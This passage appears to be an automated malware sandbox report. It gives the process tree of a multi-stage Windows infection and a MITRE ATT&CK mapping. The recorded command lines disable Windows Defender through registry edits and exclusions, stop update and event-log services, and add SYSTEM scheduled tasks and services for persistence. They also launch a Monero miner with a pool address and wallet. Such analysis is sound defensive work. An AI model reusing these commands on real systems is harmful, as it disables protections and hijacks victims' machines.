        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
        10⤵
        
        PID:2416
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        11⤵
        
        PID:2220
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        12⤵
        
        PID:2604
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        10⤵
        
        PID:1376
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        11⤵
        
        PID:2904
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        12⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2208
        
        C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        13⤵
        
        PID:1284
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        9⤵
        
        PID:3020
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        10⤵
        
        PID:2216
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        11⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1956
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        12⤵
        
        PID:1364
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 07:45:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\WHCnicp.exe\" it /rDOdidrxts 385118 /S" /V1 /F
        9⤵
        Creates scheduled task(s)
        
        PID:1376
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
        9⤵
        
        PID:2656
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        10⤵
        
        PID:3020
        
        \??\c:\windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        11⤵
        
        PID:2288
        
        C:\Users\Admin\Pictures\4kHHGWOLVZBMAhFwvzfLRphC.exe
        
        "C:\Users\Admin\Pictures\4kHHGWOLVZBMAhFwvzfLRphC.exe"
        7⤵
        
        PID:2548
        
        C:\Users\Admin\AppData\Local\Temp\7zSB47.tmp\Install.exe
        
        .\Install.exe /IjiHdidVaJ "385118" /S
        8⤵
        
        PID:1012
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        9⤵
        
        PID:448
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
        10⤵
        
        PID:2408
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        11⤵
        
        PID:1960
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        12⤵
        
        PID:1752
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
        10⤵
        
        PID:1048
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        11⤵
        
        PID:864
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        12⤵
        
        PID:2844
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
        10⤵
        
        PID:1376
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        11⤵
        
        PID:2364
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        12⤵
        
        PID:996
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
        10⤵
        
        PID:3020
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        11⤵
        
        PID:1956
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        12⤵
        
        PID:2992
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        10⤵
        
        PID:2800
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        11⤵
        
        PID:1516
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        12⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2812
        
        C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        13⤵
        
        PID:2572
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        9⤵
        
        PID:3316
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        10⤵
        
        PID:3376
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        11⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3400
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        12⤵
        
        PID:3752
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 07:45:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\DnepKhw.exe\" it /enZdidaQdW 385118 /S" /V1 /F
        9⤵
        Creates scheduled task(s)
        
        PID:3868
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
        9⤵
        
        PID:3924
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        10⤵
        
        PID:3948
        
        \??\c:\windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        11⤵
        
        PID:3956
      - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 2060 -s 880
        6⤵
        Loads dropped DLL
        
        PID:1728
    - - C:\Users\Admin\AppData\Local\Temp\1000065001\gold.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000065001\gold.exe"
        5⤵
        Executes dropped EXE
        
        PID:1556
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1556 -s 72
        6⤵
        Loads dropped DLL
        Program crash
        
        PID:924
    - - C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2352
      - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Newoff.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe" /F
        6⤵
        Creates scheduled task(s)
        
        PID:2596
      - C:\Users\Admin\AppData\Local\Temp\1000272001\FirstZ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000272001\FirstZ.exe"
        6⤵
        Executes dropped EXE
        
        PID:2664
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3056
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        7⤵
        
        PID:1560
        
        C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        8⤵
        
        PID:2656
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop UsoSvc
        7⤵
        Launches sc.exe
        
        PID:344
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        7⤵
        Launches sc.exe
        
        PID:2216
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop wuauserv
        7⤵
        Launches sc.exe
        
        PID:2408
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop bits
        7⤵
        Launches sc.exe
        
        PID:2904
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop dosvc
        7⤵
        Launches sc.exe
        
        PID:1020
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        7⤵
        
        PID:2436
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        7⤵
        
        PID:852
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        7⤵
        
        PID:344
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        7⤵
        
        PID:1052
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe delete "WSNKISKT"
        7⤵
        Launches sc.exe
        
        PID:2440
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe create "WSNKISKT" binpath= "C:\ProgramData\wikombernizc\reakuqnanrkn.exe" start= "auto"
        7⤵
        Launches sc.exe
        
        PID:3144
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        7⤵
        Launches sc.exe
        
        PID:3176
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "WSNKISKT"
        7⤵
        Launches sc.exe
        
        PID:3184
    - - C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe"
        5⤵
        Executes dropped EXE
        
        PID:1992
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1992 -s 68
        6⤵
        Loads dropped DLL
        Program crash
        
        PID:2316
- - C:\Users\Admin\AppData\Local\Temp\1000014001\5e4913c117.exe
    "C:\Users\Admin\AppData\Local\Temp\1000014001\5e4913c117.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Checks whether UAC is enabled
    PID:1948
- - C:\Users\Admin\1000017002\cb34b3b35f.exe
    "C:\Users\Admin\1000017002\cb34b3b35f.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious behavior: EnumeratesProcesses
    PID:1128

C:\Program Files (x86)\GameSyncLink\GameService.exe
"C:\Program Files (x86)\GameSyncLink\GameService.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2528
- C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:2648
- - C:\Windows\Temp\826643.exe
    "C:\Windows\Temp\826643.exe" --list-devices
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:2164

C:\Program Files (x86)\GameSyncLink\GameService.exe
"C:\Program Files (x86)\GameSyncLink\GameService.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2808
- C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
  "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
  2⤵
  - Executes dropped EXE
  PID:1080

C:\Program Files (x86)\GameSyncLink\GameService.exe
"C:\Program Files (x86)\GameSyncLink\GameService.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1952
- C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:608
- - C:\Windows\Temp\693706.exe
    "C:\Windows\Temp\693706.exe" --http-port 14343 -o xmr.2miners.com:2222 -u 83dQM82bj4yY83XKGKHnbHTzqgY4FUt2pi1JS15u7rTs8v84mTU5ny5MiRoSeyduBUAQKFZ6MsvbMHYTisNeThDM3BqQ59y --coin XMR -t 1 --no-color -p x
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    PID:2356

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1465514683134971029949653133-1099653442-1261741085338673096-17629404061753786955"
1⤵
PID:2192

C:\Windows\system32\taskeng.exe
taskeng.exe {D9A858FE-14B8-45AE-8CFA-0DBE64AB8C5F} S-1-5-21-2248906074-2862704502-246302768-1000:GHPZRGFC\Admin:Interactive:[1]
1⤵
PID:1940
- C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe
  C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe
  2⤵
  PID:2940
- C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe
  C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe
  2⤵
  PID:972
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:3628

C:\ProgramData\Google\Chrome\updater.exe
C:\ProgramData\Google\Chrome\updater.exe
1⤵
PID:2112
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:2556
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:2480
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:3020
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:2296
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:1560
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:1364
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:1292
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:1576
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  PID:2416
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  PID:2420
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  PID:2020
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  PID:3028
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:2556
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  PID:2276

C:\Windows\system32\taskeng.exe
taskeng.exe {6B8C8773-FEF3-42DF-8AE0-9CC3820424CB} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:1380
- C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\DnepKhw.exe
  C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\DnepKhw.exe it /enZdidaQdW 385118 /S
  2⤵
  PID:1516
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    PID:2020
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
      4⤵
      PID:3156
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:3144
      - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        6⤵
        
        PID:3196
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
      4⤵
      PID:2720
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:1052
      - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        6⤵
        
        PID:3080
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
      4⤵
      PID:852
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:3216
      - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        6⤵
        
        PID:3176
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
      4⤵
      PID:3200
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:344
      - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        6⤵
        
        PID:3084
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
      4⤵
      PID:3224
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        
        PID:3232
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3292
        
        C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        7⤵
        
        PID:3256
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gPALfQLGq" /SC once /ST 06:00:45 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Creates scheduled task(s)
    PID:3352
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gPALfQLGq"
    3⤵
    PID:3576
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gPALfQLGq"
    3⤵
    PID:2652

C:\ProgramData\wikombernizc\reakuqnanrkn.exe
C:\ProgramData\wikombernizc\reakuqnanrkn.exe
1⤵
PID:3240
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:3248
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:3352
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:3412
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:3360
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:3424
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:3456
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:3520
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:3560
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  PID:3584
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  PID:3592
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  PID:3600
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  PID:3608
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:3616
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  PID:3688

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Pre-OS Boot

T1542

Bootkit

T1542.003

Scheduled Task/Job

T1053

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Pre-OS Boot

T1542

Bootkit

T1542.003

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

